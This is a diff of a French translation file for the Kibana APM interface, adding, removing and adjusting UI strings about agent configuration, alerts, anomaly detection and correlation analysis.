"xpack.apm.agentConfig.deleteSection.deleteConfigSucceededTitle": "La configuration a été supprimée", "xpack.apm.agentConfig.editConfigTitle": "Modifier la configuration", - "xpack.apm.agentConfig.enableLogCorrelation.description": "Nombre booléen spécifiant si l'agent doit être intégré au MDC de SLF4J pour activer la corrélation de logs de suivi. Si cette option est configurée sur \"true\", l'agent définira \"trace.id\" et \"transaction.id\" pour les intervalles et transactions actifs sur le MDC. Depuis la version 1.16.0 de l'agent Java, l'agent ajoute également le \"error.id\" de l'erreur capturée au MDC juste avant le logging du message d'erreur. REMARQUE : bien qu'il soit autorisé d'activer ce paramètre au moment de l'exécution, vous ne pouvez pas le désactiver sans redémarrage.", + "xpack.apm.agentConfig.enableLogCorrelation.description": "Nombre booléen spécifiant si l'agent doit être intégré au MDC de SLF4J pour activer la corrélation de logs de suivi. Si cette option est configurée sur \"true\", l'agent définira \"trace.id\" et \"transaction.id\" pour les intervalles et transactions actifs sur le MDC. Depuis la version 1.16.0 de l'agent Java, l'agent ajoute également le \"error.id\" de l'erreur capturée au MDC juste avant le logging du message d'erreur. REMARQUE : bien qu'il soit autorisé d'activer ce paramètre au moment de l'exécution, vous ne pouvez pas le désactiver sans redémarrage.", "xpack.apm.agentConfig.enableLogCorrelation.label": "Activer la corrélation de logs", "xpack.apm.agentConfig.logLevel.description": "Définit le niveau de logging pour l'agent", "xpack.apm.agentConfig.logLevel.label": "Niveau de log", "xpack.apm.agentConfig.newConfig.description": "Affinez votre configuration d'agent depuis l'application APM. Les modifications sont automatiquement propagées à vos agents APM, ce qui vous évite d'effectuer un redéploiement.", - "xpack.apm.agentConfig.profilingInferredSpansEnabled.description": "Définissez cette option sur \"true\" pour que l'agent crée des intervalles pour des exécutions de méthodes basées sur async-profiler, un profiler d'échantillonnage (ou profiler statistique). En raison de la nature du fonctionnement des profilers d'échantillonnage, la durée des intervalles générés n'est pas exacte, il ne s'agit que d'estimations. \"profiling_inferred_spans_sampling_interval\" vous permet d'ajuster avec exactitude le compromis entre précision et surcharge. Les intervalles générés sont créés à la fin d'une session de profilage. Cela signifie qu'il existe un délai entre les intervalles réguliers et les intervalles générés visibles dans l'interface utilisateur. REMARQUE : cette fonctionnalité n'est pas disponible sous Windows.", + "xpack.apm.agentConfig.profilingInferredSpansEnabled.description": "Définissez cette option sur \"true\" pour que l'agent crée des intervalles pour des exécutions de méthodes basées sur async-profiler, un profiler d'échantillonnage (ou profiler statistique). En raison de la nature du fonctionnement des profilers d'échantillonnage, la durée des intervalles générés n'est pas exacte, il ne s'agit que d'estimations. \"profiling_inferred_spans_sampling_interval\" vous permet d'ajuster avec exactitude le compromis entre précision et surcharge. Les intervalles générés sont créés à la fin d'une session de profilage. Cela signifie qu'il existe un délai entre les intervalles réguliers et les intervalles générés visibles dans l'interface utilisateur. REMARQUE : cette fonctionnalité n'est pas disponible sous Windows.", "xpack.apm.agentConfig.profilingInferredSpansEnabled.label": "Intervalles générés par le profilage activés", "xpack.apm.agentConfig.profilingInferredSpansExcludedClasses.description": "Exclut les classes pour lesquelles aucun intervalle généré par le profiler ne doit être créé. Cette option prend en charge le caractère générique \"*\" qui correspond à zéro caractère ou plus. La correspondance n'est pas sensible à la casse par défaut. L'ajout de \"(?-i)\" au début d'un élément rend la correspondance sensible à la casse.", "xpack.apm.agentConfig.profilingInferredSpansExcludedClasses.label": "Classes exclues des intervalles générés par le profilage", - "xpack.apm.agentConfig.profilingInferredSpansIncludedClasses.description": "Si cette option est définie, l'agent ne créera des intervalles générés que pour les méthodes correspondant à cette liste. La définition d'une valeur peut diminuer légèrement la surcharge et réduire l'encombrement en ne créant des intervalles que pour les classes qui vous intéressent. Cette option prend en charge le caractère générique \"*\" qui correspond à zéro caractère ou plus. Par exemple : \"org.example.myapp.*\". La correspondance n'est pas sensible à la casse par défaut. L'ajout de \"(?-i)\" au début d'un élément rend la correspondance sensible à la casse.", + "xpack.apm.agentConfig.profilingInferredSpansIncludedClasses.description": "Si cette option est définie, l'agent ne créera des intervalles générés que pour les méthodes correspondant à cette liste. La définition d'une valeur peut diminuer légèrement la surcharge et réduire l'encombrement en ne créant des intervalles que pour les classes qui vous intéressent. Cette option prend en charge le caractère générique \"*\" qui correspond à zéro caractère ou plus. Par exemple : \"org.example.myapp.*\". La correspondance n'est pas sensible à la casse par défaut. L'ajout de \"(?-i)\" au début d'un élément rend la correspondance sensible à la casse.", "xpack.apm.agentConfig.profilingInferredSpansIncludedClasses.label": "Classes incluses des intervalles générés par le profilage", "xpack.apm.agentConfig.profilingInferredSpansMinDuration.description": "Durée minimale d'un intervalle généré. Veuillez noter que la durée minimale est également définie de façon implicite par l'intervalle d'échantillonnage. Toutefois, l'augmentation de l'intervalle d'échantillonnage diminue également la précision de la durée des intervalles générés.", "xpack.apm.agentConfig.profilingInferredSpansMinDuration.label": "Durée minimale des intervalles générés par le profilage", "xpack.apm.agentConfig.profilingInferredSpansSamplingInterval.description": "Fréquence à laquelle les traces de pile sont rassemblées au cours d'une session de profilage. Plus vous définissez un chiffre bas, plus les durées seront précises. Cela induit une surcharge plus élevée et un plus grand nombre d'intervalles, pour des opérations potentiellement non pertinentes. La durée minimale d'un intervalle généré par le profilage est identique à la valeur de ce paramètre.", "xpack.apm.agentConfig.profilingInferredSpansSamplingInterval.label": "Intervalle d'échantillonnage des intervalles générés par le profilage", - "xpack.apm.agentConfig.range.errorText": "{rangeType, select,\n between {doit être compris entre {min} et {max}}\n gt {doit être supérieur à {min}}\n lt {doit être inférieur à {max}}\n other {doit être un entier}\n }", "xpack.apm.agentConfig.recording.description": "Lorsque l'enregistrement est activé, l'agent instrumente les requêtes HTTP entrantes, effectue le suivi des erreurs, et collecte et envoie les indicateurs. Lorsque l'enregistrement n'est pas activé, l'agent agit comme un noop, sans collecter de données ni communiquer avec le serveur AMP, sauf pour rechercher la configuration mise à jour. Puisqu'il s'agit d'un commutateur réversible, les threads d'agents ne sont pas détruits lorsque le mode sans enregistrement est défini. Ils restent principalement inactifs, de sorte que la surcharge est négligeable. Vous pouvez utiliser ce paramètre pour contrôler dynamiquement si Elastic APM doit être activé ou désactivé.", "xpack.apm.agentConfig.recording.label": "Enregistrement", "xpack.apm.agentConfig.sanitizeFiledNames.description": "Il est parfois nécessaire d'effectuer un nettoyage, c'est-à-dire de supprimer les données sensibles envoyées à Elastic APM. Cette configuration accepte une liste de modèles de caractères génériques de champs de noms qui doivent être nettoyés. Ils s'appliquent aux en-têtes HTTP (y compris les cookies) et aux données \"application/x-www-form-urlencoded\" (champs de formulaire POST). La chaîne de la requête et le corps de la requête capturé (comme des données \"application/json\") ne seront pas nettoyés.", "xpack.apm.agentConfig.sanitizeFiledNames.label": "Nettoyer les noms des champs", - "xpack.apm.agentConfig.saveConfig.failed.text": "Une erreur est survenue pendant l'enregistrement de la configuration de \"{serviceName}\". Erreur : \"{errorMessage}\"", "xpack.apm.agentConfig.saveConfig.failed.title": "La configuration n'a pas pu être enregistrée", - "xpack.apm.agentConfig.saveConfig.succeeded.text": "La configuration de \"{serviceName}\" a été enregistrée. La propagation jusqu'aux agents pourra prendre un certain temps.", "xpack.apm.agentConfig.saveConfig.succeeded.title": "Configuration enregistrée", "xpack.apm.agentConfig.saveConfigurationButtonLabel": "Étape suivante", - "xpack.apm.agentConfig.serverTimeout.description": "Si une requête au serveur APM prend plus de temps que le délai d'expiration configuré,\nla requête est annulée et l'événement (exception ou transaction) est abandonné.\nDéfinissez sur 0 pour désactiver les délais d'expiration.\n\nAVERTISSEMENT : si les délais d'expiration sont désactivés ou définis sur une valeur élevée, il est possible que votre application rencontre des problèmes de mémoire en cas d'expiration du serveur APM.", + "xpack.apm.agentConfig.serverTimeout.description": "Si une requête au serveur APM prend plus de temps que le délai d'expiration configuré,\nla requête est annulée et l'événement (exception ou transaction) est abandonné.\nDéfinissez sur 0 pour désactiver les délais d'expiration.\n\nAVERTISSEMENT : si les délais d'expiration sont désactivés ou définis sur une valeur élevée, il est possible que votre application rencontre des problèmes de mémoire en cas d'expiration du serveur APM.", "xpack.apm.agentConfig.serverTimeout.label": "Délai d'expiration du serveur", "xpack.apm.agentConfig.servicePage.alreadyConfiguredOption": "déjà configuré", "xpack.apm.agentConfig.servicePage.cancelButton": "Annuler", @@ -7432,9 +6686,9 @@ "xpack.apm.agentConfig.settingsPage.notFound.message": "La configuration demandée n'existe pas", "xpack.apm.agentConfig.settingsPage.notFound.title": "Désolé, une erreur est survenue", "xpack.apm.agentConfig.settingsPage.saveButton": "Enregistrer la configuration", - "xpack.apm.agentConfig.spanFramesMinDuration.description": "Dans ses paramètres par défaut, l'agent APM collectera une trace de la pile avec chaque intervalle enregistré.\nBien qu'il soit très pratique de trouver l'endroit exact dans votre code qui provoque l'intervalle, la collecte de cette trace de la pile provoque une certaine surcharge. \nLorsque cette option est définie sur une valeur négative, telle que \"-1ms\", les traces de pile sont collectées pour tous les intervalles. En choisissant une valeur positive, par ex. \"5ms\", la collecte des traces de pile se limitera aux intervalles dont la durée est égale ou supérieure à la valeur donnée, par ex. 5 millisecondes.\n\nPour désactiver complètement la collecte des traces de pile des intervalles, réglez la valeur sur \"0ms\".", + "xpack.apm.agentConfig.spanFramesMinDuration.description": "Dans ses paramètres par défaut, l'agent APM collectera une trace de la pile avec chaque intervalle enregistré.\nBien qu'il soit très pratique de trouver l'endroit exact dans votre code qui provoque l'intervalle, la collecte de cette trace de la pile provoque une certaine surcharge. \nLorsque cette option est définie sur une valeur négative, telle que \"-1ms\", les traces de pile sont collectées pour tous les intervalles. En choisissant une valeur positive, par ex. \"5ms\", la collecte des traces de pile se limitera aux intervalles dont la durée est égale ou supérieure à la valeur donnée, par ex. 5 millisecondes.\n\nPour désactiver complètement la collecte des traces de pile des intervalles, réglez la valeur sur \"0ms\".", "xpack.apm.agentConfig.spanFramesMinDuration.label": "Durée minimale des cadres des intervalles", - "xpack.apm.agentConfig.stackTraceLimit.description": "En définissant cette option sur 0, la collecte des traces de pile sera désactivée. Toute valeur entière positive sera utilisée comme nombre maximal de cadres à collecter. La valeur -1 signifie que tous les cadres seront collectés.", + "xpack.apm.agentConfig.stackTraceLimit.description": "En définissant cette option sur 0, la collecte des traces de pile sera désactivée. Toute valeur entière positive sera utilisée comme nombre maximal de cadres à collecter. La valeur -1 signifie que tous les cadres seront collectés.", "xpack.apm.agentConfig.stackTraceLimit.label": "Limite de trace de pile", "xpack.apm.agentConfig.stressMonitorCpuDurationThreshold.description": "Durée minimale requise pour déterminer si le système est actuellement sous tension ou si la tension précédemment détectée a été allégée. Toutes les mesures réalisées pendant ce laps de temps doivent être cohérentes par rapport au seuil concerné pour pouvoir détecter un changement d'état de tension. La valeur doit être d'au moins \"1m\".", "xpack.apm.agentConfig.stressMonitorCpuDurationThreshold.label": "Seuil de durée de tension CPU du monitoring", @@ -7450,7 +6704,7 @@ "xpack.apm.agentConfig.transactionIgnoreUrl.label": "Ignorer les transactions basées sur les URL", "xpack.apm.agentConfig.transactionMaxSpans.description": "Limite la quantité d'intervalles enregistrés par transaction.", "xpack.apm.agentConfig.transactionMaxSpans.label": "Nb maxi d'intervalles de transaction", - "xpack.apm.agentConfig.transactionSampleRate.description": "Par défaut, l'agent échantillonnera chaque transaction (par ex. requête à votre service). Pour réduire la surcharge et les exigences de stockage, vous pouvez définir le taux d'échantillonnage sur une valeur comprise entre 0,0 et 1,0. La durée globale et le résultat des transactions non échantillonnées seront toujours enregistrés, mais pas les informations de contexte, les étiquettes ni les intervalles.", + "xpack.apm.agentConfig.transactionSampleRate.description": "Par défaut, l'agent échantillonnera chaque transaction (par ex. requête à votre service). Pour réduire la surcharge et les exigences de stockage, vous pouvez définir le taux d'échantillonnage sur une valeur comprise entre 0,0 et 1,0. La durée globale et le résultat des transactions non échantillonnées seront toujours enregistrés, mais pas les informations de contexte, les étiquettes ni les intervalles.", "xpack.apm.agentConfig.transactionSampleRate.label": "Taux d'échantillonnage des transactions", "xpack.apm.agentConfig.unsavedSetting.tooltip": "Non enregistré", "xpack.apm.agentMetrics.java.gcRate": "Taux RM", @@ -7480,49 +6734,48 @@ "xpack.apm.alerts.action_variables.transactionType": "Type de transaction pour lequel l'alerte est créée", "xpack.apm.alerts.action_variables.triggerValue": "Valeur ayant dépassé le seuil et déclenché l'alerte", "xpack.apm.alerts.action_variables.viewInAppUrl": "Lien vers la vue ou la fonctionnalité d'Elastic qui peut être utilisée pour examiner l'alerte et son contexte de manière plus approfondie", + "xpack.apm.alerts.alertStatusFilter.active": "Actif", + "xpack.apm.alerts.alertStatusFilter.button.legend": "Filtrer par", + "xpack.apm.alerts.alertStatusFilter.recovered": "Récupéré", + "xpack.apm.alerts.alertStatusFilter.showAll": "Afficher tout", "xpack.apm.alerts.anomalySeverity.criticalLabel": "critique", "xpack.apm.alerts.anomalySeverity.majorLabel": "majeur", - "xpack.apm.alerts.anomalySeverity.minor": "mineur", - "xpack.apm.alerts.anomalySeverity.scoreDetailsDescription": "score {value} {value, select, critical {} other {et plus}}", + "xpack.apm.alerts.anomalySeverity.minor": "mineure", "xpack.apm.alerts.anomalySeverity.warningLabel": "avertissement", "xpack.apm.alertTypes.anomaly.description": "Alerte lorsque la latence, le rendement ou le taux de transactions ayant échoué d'un service est anormal.", - "xpack.apm.alertTypes.errorCount.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil : \\{\\{context.threshold\\}\\} erreurs\n- Valeur de déclenchement : \\{\\{context.triggerValue\\}\\} erreurs sur la dernière période de \\{\\{context.interval\\}\\}", + "xpack.apm.alertTypes.errorCount.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil : \\{\\{context.threshold\\}\\} erreurs\n- Valeur de déclenchement : \\{\\{context.triggerValue\\}\\} erreurs sur la dernière période de \\{\\{context.interval\\}\\}", "xpack.apm.alertTypes.errorCount.description": "Alerte lorsque le nombre d'erreurs d'un service dépasse un seuil défini.", - "xpack.apm.alertTypes.errorCount.reason": "Le nombre d'erreurs est {measured} dans le dernier {interval} pour {serviceName}. Alerte lorsque > {threshold}.", - "xpack.apm.alertTypes.transactionDuration.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Type : \\{\\{context.transactionType\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil de latence : \\{\\{context.threshold\\}\\} ms\n- Latence observée : \\{\\{context.triggerValue\\}\\} sur la dernière période de \\{\\{context.interval\\}\\}", + "xpack.apm.alertTypes.transactionDuration.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Type : \\{\\{context.transactionType\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil de latence : \\{\\{context.threshold\\}\\} ms\n- Latence observée : \\{\\{context.triggerValue\\}\\} sur la dernière période de \\{\\{context.interval\\}\\}", "xpack.apm.alertTypes.transactionDuration.description": "Alerte lorsque la latence d'un type de transaction spécifique dans un service dépasse le seuil défini.", - "xpack.apm.alertTypes.transactionDuration.reason": "La latence de {aggregationType} est {measured} dans le dernier {interval} pour {serviceName}. Alerte lorsque > {threshold}.", - "xpack.apm.alertTypes.transactionDurationAnomaly.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Type : \\{\\{context.transactionType\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil de sévérité : \\{\\{context.threshold\\}\\}\n- Valeur de sévérité : \\{\\{context.triggerValue\\}\\}\n", - "xpack.apm.alertTypes.transactionDurationAnomaly.reason": "Une anomalie {severityLevel} avec un score de {measured} a été détectée dans le dernier {interval} pour {serviceName}.", - "xpack.apm.alertTypes.transactionErrorRate.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Type : \\{\\{context.transactionType\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil : \\{\\{context.threshold\\}\\} %\n- Valeur de déclenchement : \\{\\{context.triggerValue\\}\\} % des erreurs sur la dernière période de \\{\\{context.interval\\}\\}", + "xpack.apm.alertTypes.transactionDurationAnomaly.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Type : \\{\\{context.transactionType\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil de sévérité : \\{\\{context.threshold\\}\\}\n- Valeur de sévérité : \\{\\{context.triggerValue\\}\\}\n", + "xpack.apm.alertTypes.transactionErrorRate.defaultActionMessage": "L'alerte \\{\\{alertName\\}\\} se déclenche en raison des conditions suivantes :\n\n- Nom de service : \\{\\{context.serviceName\\}\\}\n- Type : \\{\\{context.transactionType\\}\\}\n- Environnement : \\{\\{context.environment\\}\\}\n- Seuil : \\{\\{context.threshold\\}\\} %\n- Valeur de déclenchement : \\{\\{context.triggerValue\\}\\} % des erreurs sur la dernière période de \\{\\{context.interval\\}\\}", "xpack.apm.alertTypes.transactionErrorRate.description": "Alerte lorsque le taux d'erreurs de transaction d'un service dépasse un seuil défini.", - "xpack.apm.alertTypes.transactionErrorRate.reason": "L'échec des transactions est {measured} dans le dernier {interval} pour {serviceName}. Alerte lorsque > {threshold}.", "xpack.apm.analyzeDataButton.label": "Explorer les données", "xpack.apm.analyzeDataButton.tooltip": "La fonctionnalité Explorer les données vous permet de sélectionner et de filtrer les données de résultat dans toute dimension et de rechercher la cause ou l'impact des problèmes de performances", - "xpack.apm.anomaly_detection.error.invalid_license": "Pour utiliser la détection des anomalies, vous devez disposer d'une licence Elastic Platinum. Cette licence vous permet de monitorer vos services à l'aide du Machine Learning.", - "xpack.apm.anomaly_detection.error.missing_read_privileges": "Vous devez disposer des privilèges \"read\" (lecture) pour le Machine Learning et l'APM pour consulter les tâches de détection des anomalies", - "xpack.apm.anomaly_detection.error.missing_write_privileges": "Vous devez disposer des privilèges \"write\" (écriture) pour le Machine Learning et l'APM pour créer des tâches de détection des anomalies", - "xpack.apm.anomaly_detection.error.not_available": "Le Machine Learning est indisponible", - "xpack.apm.anomaly_detection.error.not_available_in_space": "Le Machine Learning est indisponible dans l'espace sélectionné", + "xpack.apm.anomaly_detection.error.invalid_license": "Pour utiliser la détection des anomalies, vous devez disposer d'une licence Elastic Platinum. Cette licence vous permet de monitorer vos services à l'aide du Machine Learning.", + "xpack.apm.anomaly_detection.error.missing_read_privileges": "Vous devez disposer des privilèges \"read\" (lecture) pour le Machine Learning et l'APM pour consulter les tâches de détection des anomalies", + "xpack.apm.anomaly_detection.error.missing_write_privileges": "Vous devez disposer des privilèges \"write\" (écriture) pour le Machine Learning et l'APM pour créer des tâches de détection des anomalies", + "xpack.apm.anomaly_detection.error.not_available": "Le Machine Learning est indisponible", + "xpack.apm.anomaly_detection.error.not_available_in_space": "Le Machine Learning est indisponible dans l'espace sélectionné", "xpack.apm.anomalyAlert.name": "Anomalie", - "xpack.apm.anomalyDetection.createJobs.failed.text": "Une erreur est survenue lors de la création d'une ou de plusieurs tâches de détection des anomalies pour les environnements de service APM [{environments}]. Erreur : \"{errorMessage}\"", "xpack.apm.anomalyDetection.createJobs.failed.title": "Les tâches de détection des anomalies n'ont pas pu être créées", - "xpack.apm.anomalyDetection.createJobs.succeeded.text": "Tâches de détection des anomalies créées avec succès pour les environnements de service APM [{environments}]. Le démarrage de l'analyse du trafic à la recherche d'anomalies par le Machine Learning va prendre un certain temps.", "xpack.apm.anomalyDetection.createJobs.succeeded.title": "Tâches de détection des anomalies créées", "xpack.apm.anomalyDetectionSetup.jobFetchFailureText": "Impossible de déterminer l'état de la configuration de la détection des anomalies.", "xpack.apm.anomalyDetectionSetup.linkLabel": "Détection des anomalies", - "xpack.apm.anomalyDetectionSetup.notEnabledForEnvironmentText": "La détection des anomalies n'est pas encore activée pour l'environnement \"{currentEnvironment}\". Cliquez pour continuer la configuration.", "xpack.apm.anomalyDetectionSetup.notEnabledText": "La détection des anomalies n'est pas encore activée. Cliquez pour continuer la configuration.", "xpack.apm.anomalyDetectionSetup.upgradeableJobsText": "Mises à jour disponibles pour les tâches de détection des anomalies existantes.", "xpack.apm.anomalyScore": "Anomalie {severity, select, minor {mineure} major {majeure} critical {critique}}", "xpack.apm.api.apiKeys.securityRequired": "Le plug-in de sécurité est requis", - "xpack.apm.api.fleet.cloud_apm_package_policy.requiredRoleOnCloud": "Opération autorisée uniquement pour les utilisateurs Elastic Cloud disposant du rôle de superutilisateur.", + "xpack.apm.api.fleet.cloud_apm_package_policy.requiredRoleOnCloud": "Opération autorisée uniquement pour les utilisateurs Elastic Cloud disposant du rôle de superutilisateur.", "xpack.apm.api.fleet.fleetSecurityRequired": "Les plug-ins Fleet et Security sont requis", "xpack.apm.apmDescription": "Collecte automatiquement les indicateurs et les erreurs de performances détaillés depuis vos applications.", "xpack.apm.apmSchema.index": "Schéma du serveur APM - Index", "xpack.apm.apmServiceGroups.index": "Groupes de services APM - Index", "xpack.apm.apmSettings.index": "Paramètres APM - Index", + "xpack.apm.betaBadgeDescription": "Cette fonctionnalité est actuellement en version bêta. Si vous rencontrez des bugs ou si vous souhaitez apporter des commentaires, ouvrez un ticket de problème ou visitez notre forum de discussion.", + "xpack.apm.betaBadgeLabel": "Bêta", "xpack.apm.chart.annotation.version": "Version", + "xpack.apm.chart.comparison.defaultPreviousPeriodLabel": "Période précédente", "xpack.apm.chart.cpuSeries.processAverageLabel": "Moyenne de processus", "xpack.apm.chart.cpuSeries.processMaxLabel": "Max de processus", "xpack.apm.chart.cpuSeries.systemAverageLabel": "Moyenne du système", @@ -7532,10 +6785,11 @@ "xpack.apm.chart.memorySeries.systemMaxLabel": "Max.", "xpack.apm.coldstartRate": "Taux de démarrage à froid", "xpack.apm.coldstartRate.chart.coldstartRate": "Taux de démarrage à froid (moy.)", - "xpack.apm.compositeSpanCallsLabel": ", {count} appels, sur une moyenne de {duration}", + "xpack.apm.comparison.expectedBoundsTitle": "Limites attendues", + "xpack.apm.comparison.mlExpectedBoundsDisabledText": "Limites attendues (la détection d'anomalie doit être activée pour l’environnement)", + "xpack.apm.comparison.mlExpectedBoundsText": "Limites attendues", "xpack.apm.compositeSpanDurationLabel": "Durée moyenne", "xpack.apm.correlations.cancelButtonTitle": "Annuler", - "xpack.apm.correlations.ccsWarningCalloutBody": "Les données pour l'analyse de corrélation n'ont pas pu être totalement récupérées. Cette fonctionnalité est prise en charge uniquement à partir des versions {version} et ultérieures.", "xpack.apm.correlations.ccsWarningCalloutTitle": "Compatibilité de recherche inter-clusters", "xpack.apm.correlations.correlationsTable.errorMessage": "Impossible de récupérer", "xpack.apm.correlations.correlationsTable.excludeDescription": "Exclure la valeur", @@ -7552,28 +6806,24 @@ "xpack.apm.correlations.failedTransactions.correlationsTable.pValueDescription": "La probabilité d'obtenir au moins cette quantité de nom du champ et de valeur pour les transactions ayant échoué, compte tenu de sa prévalence dans les transactions réussies.", "xpack.apm.correlations.failedTransactions.correlationsTable.pValueLabel": "valeur-p", "xpack.apm.correlations.failedTransactions.correlationsTable.scoreLabel": "Score", - "xpack.apm.correlations.failedTransactions.correlationsTable.scoreTooltip": "Score [0-1] d'un attribut ; plus le score est élevé, plus un attribut contribue à l'échec des transactions.", + "xpack.apm.correlations.failedTransactions.correlationsTable.scoreTooltip": "Score [0-1] d'un attribut ; plus le score est élevé, plus un attribut contribue à l'échec des transactions.", "xpack.apm.correlations.failedTransactions.correlationsTable.successPercentageDescription": "Pourcentage de fois où le terme apparaît dans des transactions ayant réussi.", "xpack.apm.correlations.failedTransactions.correlationsTable.successPercentageLabel": "% de réussite", "xpack.apm.correlations.failedTransactions.errorTitle": "Une erreur est survenue lors de l'exécution de corrélations sur les transactions ayant échoué", - "xpack.apm.correlations.failedTransactions.helpPopover.basicExplanation": "Les corrélations vous aident à découvrir les attributs qui ont le plus d'influence pour distinguer les échecs et les succès d'une transaction. Les transactions sont considérées comme un échec lorsque leur valeur {field} est {value}.", "xpack.apm.correlations.failedTransactions.helpPopover.performanceExplanation": "Cette analyse réalise des recherches statistiques sur un grand nombre d'attributs. Pour les plages temporelles étendues et les services ayant un rendement de transactions élevé, cela peut prendre un certain temps. Réduisez la plage temporelle pour améliorer les performances.", "xpack.apm.correlations.failedTransactions.helpPopover.tableExplanation": "Le tableau est trié par scores, qui sont mappés aux niveaux d'impact élevé, moyen ou bas. Les attributs ayant un niveau d'impact élevé sont plus susceptibles de faire échouer les transactions.", "xpack.apm.correlations.failedTransactions.helpPopover.title": "Corrélations des transactions ayant échoué", "xpack.apm.correlations.failedTransactions.panelTitle": "Distribution de la latence des transactions ayant échoué", "xpack.apm.correlations.failedTransactions.tableTitle": "Corrélations", - "xpack.apm.correlations.fieldContextPopover.addFilterAriaLabel": "Filtrer sur le {fieldName} : \"{value}\"", - "xpack.apm.correlations.fieldContextPopover.calculatedFromSampleDescription": "Calculé à partir d'un échantillon de {sampleSize} documents", "xpack.apm.correlations.fieldContextPopover.descriptionTooltipContent": "Afficher le top 10 des valeurs de champ", - "xpack.apm.correlations.fieldContextPopover.fieldTopValuesLabel": "Top 10 des valeurs", - "xpack.apm.correlations.fieldContextPopover.notTopTenValueMessage": "Le terme sélectionné n'est pas dans le top 10", - "xpack.apm.correlations.fieldContextPopover.removeFilterAriaLabel": "Exclure le {fieldName} : \"{value}\"", + "xpack.apm.correlations.fieldContextPopover.fieldTopValuesLabel": "Top 10 des valeurs", + "xpack.apm.correlations.fieldContextPopover.notTopTenValueMessage": "Le terme sélectionné n'est pas dans le top 10", "xpack.apm.correlations.fieldContextPopover.topFieldValuesAriaLabel": "Afficher le top 10 des valeurs de champ", "xpack.apm.correlations.highImpactText": "Élevé", "xpack.apm.correlations.latencyCorrelations.advancedStatisticsLabel": "Statistiques avancées", "xpack.apm.correlations.latencyCorrelations.advancedStatisticsTooltipContent": "Activer des informations statistiques supplémentaires pour obtenir les résultats de la corrélation.", "xpack.apm.correlations.latencyCorrelations.correlationsTable.actionsLabel": "Filtre", - "xpack.apm.correlations.latencyCorrelations.correlationsTable.correlationColumnDescription": "Score de corrélation [0-1] d'un attribut ; plus le score est élevé, plus un attribut augmente la latence.", + "xpack.apm.correlations.latencyCorrelations.correlationsTable.correlationColumnDescription": "Score de corrélation [0-1] d'un attribut ; plus le score est élevé, plus un attribut augmente la latence.", "xpack.apm.correlations.latencyCorrelations.correlationsTable.correlationLabel": "Corrélation", "xpack.apm.correlations.latencyCorrelations.correlationsTable.excludeDescription": "Filtrer la valeur", "xpack.apm.correlations.latencyCorrelations.correlationsTable.excludeLabel": "Exclure", @@ -7590,23 +6840,24 @@ "xpack.apm.correlations.latencyPopoverChartExplanation": "Le graphique de distribution de la latence permet de visualiser la latence globale des transactions dans le groupe de transactions. Lorsque vous passez votre souris sur des attributs du tableau, leur distribution de latence est ajoutée au graphique.", "xpack.apm.correlations.latencyPopoverFilterExplanation": "Vous pouvez également ajouter ou retirer des filtres pour modifier les requêtes dans l'application APM.", "xpack.apm.correlations.latencyPopoverPerformanceExplanation": "Cette analyse réalise des recherches statistiques sur un grand nombre d'attributs. Pour les plages temporelles étendues et les services ayant un rendement de transactions élevé, cela peut prendre un certain temps. Réduisez la plage temporelle pour améliorer les performances.", - "xpack.apm.correlations.latencyPopoverTableExplanation": "Le tableau est trié par coefficient de corrélation, de 0 à 1. Les attributs ayant des valeurs de corrélation plus élevées sont plus susceptibles de contribuer à des transactions à haute latence.", + "xpack.apm.correlations.latencyPopoverTableExplanation": "Le tableau est trié par coefficient de corrélation, de 0 à 1. Les attributs ayant des valeurs de corrélation plus élevées sont plus susceptibles de contribuer à des transactions à haute latence.", "xpack.apm.correlations.latencyPopoverTitle": "Corrélations de latence", - "xpack.apm.correlations.license.text": "Pour utiliser l'API de corrélations, vous devez disposer d'une licence Elastic Platinum.", + "xpack.apm.correlations.license.text": "Pour utiliser l'API de corrélations, vous devez disposer d'une licence Elastic Platinum.", "xpack.apm.correlations.lowImpactText": "Bas", "xpack.apm.correlations.mediumImpactText": "Moyenne", "xpack.apm.correlations.noCorrelationsTextLine1": "Les corrélations ne seront identifiées que si leur impact est important.", "xpack.apm.correlations.noCorrelationsTextLine2": "Essayez de sélectionner une autre plage temporelle ou de retirer des filtres appliqués.", "xpack.apm.correlations.noCorrelationsTitle": "Aucune corrélation importante", "xpack.apm.correlations.progressAriaLabel": "Progression", - "xpack.apm.correlations.progressTitle": "Progression : {progress} %", "xpack.apm.correlations.refreshButtonTitle": "Actualiser", "xpack.apm.correlations.veryLowImpactText": "Très bas", "xpack.apm.customLink.buttom.create": "Créer un lien personnalisé", "xpack.apm.customLink.buttom.create.title": "Créer", "xpack.apm.customLink.buttom.manage": "Gérer des liens personnalisés", "xpack.apm.customLink.empty": "Aucun lien personnalisé trouvé. Configurez vos propres liens personnalisés, par ex. un lien vers un tableau de bord spécifique ou un lien externe.", + "xpack.apm.dependecyOperationDetailView.header.backLinkLabel": "Toutes les opérations", "xpack.apm.dependencies.kueryBarPlaceholder": "Rechercher dans les indicateurs de dépendance (par ex., span.destination.service.resource:elasticsearch)", + "xpack.apm.dependenciesInventory.dependencyTableColumn": "Dépendance", "xpack.apm.dependenciesTable.columnErrorRate": "Taux de transactions ayant 